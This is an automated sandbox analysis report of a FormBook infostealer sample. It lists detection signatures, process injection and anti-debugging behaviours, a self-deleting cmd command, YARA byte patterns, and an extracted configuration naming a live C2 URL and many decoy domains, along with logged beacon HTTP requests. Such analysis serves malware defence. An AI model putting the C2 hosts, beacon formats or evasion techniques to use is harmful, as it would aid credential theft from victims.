Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Y1p8VPvyU2

Overview

General Information

Sample Name:Y1p8VPvyU2 (renamed file extension from none to exe)
Analysis ID:532909
MD5:83be105c9fa2427bd6079f5d19659596
SHA1:1430baa740d2cd40a507cbfa8fe62e3d78424315
SHA256:8cd6125941710166af38133bce6cae9f9cc41c8d88ff774cd691081d193015a1
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • Y1p8VPvyU2.exe (PID: 7100 cmdline: "C:\Users\user\Desktop\Y1p8VPvyU2.exe" MD5: 83BE105C9FA2427BD6079F5D19659596)
    • Y1p8VPvyU2.exe (PID: 1304 cmdline: "C:\Users\user\Desktop\Y1p8VPvyU2.exe" MD5: 83BE105C9FA2427BD6079F5D19659596)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 4816 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 3192 cmdline: /c del "C:\Users\user\Desktop\Y1p8VPvyU2.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.tgalegail.quest/n6fr/"], "decoy": ["magnetic-island-qld.com", "yr-golf.com", "udyam-registration.com", "paulsamaco.com", "mimisminiatureboutique.store", "csspadding.com", "gujaratigyaan.com", "findphotographersonline.com", "clevelawareness.com", "purelyhawaii.com", "2axx.com", "tricktodance.com", "getstoic.com", "globexglobalstore.com", "mysticnail.net", "handejqr.com", "letswatch.online", "lnfddttoyof6.xyz", "tdc-trust.com", "federalimmigrationgola.com", "cinasing.com", "614721.com", "pumpizy.com", "satsumauosen-official.com", "fairytalesinc.com", "fastbest.host", "assisttm.com", "triniautotrader.com", "alissanoume.xyz", "ma-manger.com", "twinpick.paris", "easycv4u.com", "xn--2i0bm4p1b62jv8dxz3b7uj.com", "ventleetailoronline.com", "8355512.win", "catlyfoundation.com", "mygeorgecolemanfordstory.com", "haiphongmap.com", "canvasb.net", "salvationhubtv.com", "teamisenberg.com", "innoclubs.com", "glwcn.net", "byshelly.biz", "commongroundcowork.com", "zhonglucredit.com", "tyjgfuke.com", "caixadepandora.club", "webuywholesalerhouses.com", "hundvardag.com", "nchh02.xyz", "oqnr.top", "rapidfreecredit.com", "alquilarorihuela.com", "medicijnenshop.com", "somoslaostra.com", "luvvlyjubblyshop.com", "housestephenson.com", "39abxx.com", "gsjbd1.club", "luisantonioenedina.com", "xn--pckwb0cye6947ajzku8opzi.com", "jakihmentha.quest", "clothingteesshop.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.Y1p8VPvyU2.exe.2420000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.Y1p8VPvyU2.exe.2420000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.Y1p8VPvyU2.exe.2420000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15cd9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dec:$sqlite3step: 68 34 1C 7B E1
        • 0x15d08:$sqlite3text: 68 38 2A 90 C5
        • 0x15e2d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
        1.0.Y1p8VPvyU2.exe.400000.4.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.0.Y1p8VPvyU2.exe.400000.4.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 28 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.tgalegail.quest/n6fr/"], "decoy": ["magnetic-island-qld.com", "yr-golf.com", "udyam-registration.com", "paulsamaco.com", "mimisminiatureboutique.store", "csspadding.com", "gujaratigyaan.com", "findphotographersonline.com", "clevelawareness.com", "purelyhawaii.com", "2axx.com", "tricktodance.com", "getstoic.com", "globexglobalstore.com", "mysticnail.net", "handejqr.com", "letswatch.online", "lnfddttoyof6.xyz", "tdc-trust.com", "federalimmigrationgola.com", "cinasing.com", "614721.com", "pumpizy.com", "satsumauosen-official.com", "fairytalesinc.com", "fastbest.host", "assisttm.com", "triniautotrader.com", "alissanoume.xyz", "ma-manger.com", "twinpick.paris", "easycv4u.com", "xn--2i0bm4p1b62jv8dxz3b7uj.com", "ventleetailoronline.com", "8355512.win", "catlyfoundation.com", "mygeorgecolemanfordstory.com", "haiphongmap.com", "canvasb.net", "salvationhubtv.com", "teamisenberg.com", "innoclubs.com", "glwcn.net", "byshelly.biz", "commongroundcowork.com", "zhonglucredit.com", "tyjgfuke.com", "caixadepandora.club", "webuywholesalerhouses.com", "hundvardag.com", "nchh02.xyz", "oqnr.top", "rapidfreecredit.com", "alquilarorihuela.com", "medicijnenshop.com", "somoslaostra.com", "luvvlyjubblyshop.com", "housestephenson.com", "39abxx.com", "gsjbd1.club", "luisantonioenedina.com", "xn--pckwb0cye6947ajzku8opzi.com", "jakihmentha.quest", "clothingteesshop.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Y1p8VPvyU2.exeVirustotal: Detection: 35%Perma Link
          Source: Y1p8VPvyU2.exeReversingLabs: Detection: 64%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0.2.Y1p8VPvyU2.exe.2420000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Y1p8VPvyU2.exe.2420000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Y1p8VPvyU2.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, type: MEMORY
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nsj1052.tmp\msvofdls.dllReversingLabs: Detection: 50%
          Source: 1.0.Y1p8VPvyU2.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.Y1p8VPvyU2.exe.2420000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.Y1p8VPvyU2.exe.400000.1.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 6.2.cscript.exe.592796c.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.1.Y1p8VPvyU2.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.Y1p8VPvyU2.exe.400000.3.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.0.Y1p8VPvyU2.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.Y1p8VPvyU2.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.Y1p8VPvyU2.exe.400000.2.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 1.0.Y1p8VPvyU2.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 6.2.cscript.exe.35c8670.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.0.Y1p8VPvyU2.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Y1p8VPvyU2.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: cscript.pdbUGP source: Y1p8VPvyU2.exe, 00000001.00000002.361796022.0000000000A60000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Y1p8VPvyU2.exe, 00000000.00000003.303889590.0000000002C00000.00000004.00000001.sdmp, Y1p8VPvyU2.exe, 00000000.00000003.304490729.0000000002A70000.00000004.00000001.sdmp, Y1p8VPvyU2.exe, 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Y1p8VPvyU2.exe, 00000001.00000002.362000992.0000000000BFF000.00000040.00000001.sdmp, cscript.exe, 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp, cscript.exe, 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Y1p8VPvyU2.exe, Y1p8VPvyU2.exe, 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Y1p8VPvyU2.exe, 00000001.00000002.362000992.0000000000BFF000.00000040.00000001.sdmp, cscript.exe, cscript.exe, 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp, cscript.exe, 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp
          Source: Binary string: cscript.pdb source: Y1p8VPvyU2.exe, 00000001.00000002.361796022.0000000000A60000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00405C22 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00402630 FindFirstFileA,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.assisttm.com
          Source: C:\Windows\explorer.exeDomain query: www.gsjbd1.club
          Source: C:\Windows\explorer.exeNetwork Connect: 23.110.214.34 80
          Source: C:\Windows\explorer.exeNetwork Connect: 45.8.125.8 80
          Source: C:\Windows\explorer.exeDomain query: www.tyjgfuke.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.yr-golf.com
          Source: C:\Windows\explorer.exeDomain query: www.fastbest.host
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.tgalegail.quest/n6fr/
          Source: Joe Sandbox ViewASN Name: LEASEWEB-USA-LAX-11US LEASEWEB-USA-LAX-11US
          Source: Joe Sandbox ViewASN Name: SELECTELRU SELECTELRU
          Source: global trafficHTTP traffic detected: GET /n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=BQDMjsZC/MHMhOokLNCZ8NvLdfoNcIlcbjuvjCJyzVYcZRVM3RE3M6YlVSnQ+pY87GBB HTTP/1.1Host: www.yr-golf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n6fr/?r8Yhe8X=GhRWdiRsNNJH8eQL+yxTqcpdK2zUc5yAzRv8ilcs8c/60sXMgS13/r7ilAGjTWuYzon7&W0Gd5=_zrxFrQh HTTP/1.1Host: www.assisttm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=RitrxMT4CF2430UT8yTHljH4YcWCFGycH+KnQUedz6G1CLl+fZ1eccWunXIbAos2Mzom HTTP/1.1Host: www.fastbest.hostConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 02 Dec 2021 19:00:36 GMTContent-Type: text/htmlContent-Length: 275ETag: "61973ffe-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 02 Dec 2021 19:00:41 GMTContent-Type: text/htmlContent-Length: 275ETag: "61a4f026-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 02 Dec 2021 19:01:18 GMTContent-Type: text/html; charset=UTF-8Content-Length: 7081Connection: closeLast-Modified: Mon, 27 Sep 2021 00:52:07 GMTETag: "1ba9-5ccef81a2c93b"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 66 61 73 74 62 65 73 74 20 2d 20 d0 a5 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 20 d0 b4 d0 bb d1 8f 20 d0 ba d0 b0 d0 b6 d0 b4 d0 be d0 b3 d0 be 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 73 71 55 49 6d 44 43 56 4b 41 73 37 2e 69 63 6f 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 77 67 68 74 40 33 30 30 3b 34 30 30 3b 36 30 30 3b 37 30 30 3b 38 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4a 6f 73 65 66 69 6e 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 51 44 54 38 59 66 4e 30 42 46 63 4d 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 68 4b 66 71 4e 6a 77 58 50 53 7a 65 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 61 74 54 63 73 52 4a 4f 4c 6f 4d 6c 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 6f 68 4f 71 6c 77 38 70 6c 39 6e 68 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 4c 43 50 36 72 75 4c 70 4d 48 5a 58 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 2
          Source: Y1p8VPvyU2.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: Y1p8VPvyU2.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: cscript.exe, 00000006.00000002.567221825.0000000003647000.00000004.00000020.sdmpString found in binary or memory: http://www.tyjgfuke.com/$t
          Source: cscript.exe, 00000006.00000002.567221825.0000000003647000.00000004.00000020.sdmpString found in binary or memory: http://www.tyjgfuke.com/n6fr/?r8Yhe8X=LSrsi9BeeNNPJfOX4A9nLsTLbEdx4M4dJGVYJBt
          Source: cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmpString found in binary or memory: https://browsehappy.com/
          Source: cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmpString found in binary or memory: https://fastbest.host
          Source: cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Josefin
          Source: cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Open
          Source: cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmpString found in binary or memory: https://fonts.gstatic.com
          Source: cscript.exe, 00000006.00000002.568909569.0000000005AA2000.00000004.00020000.sdmpString found in binary or memory: https://via.placeholder.com/100
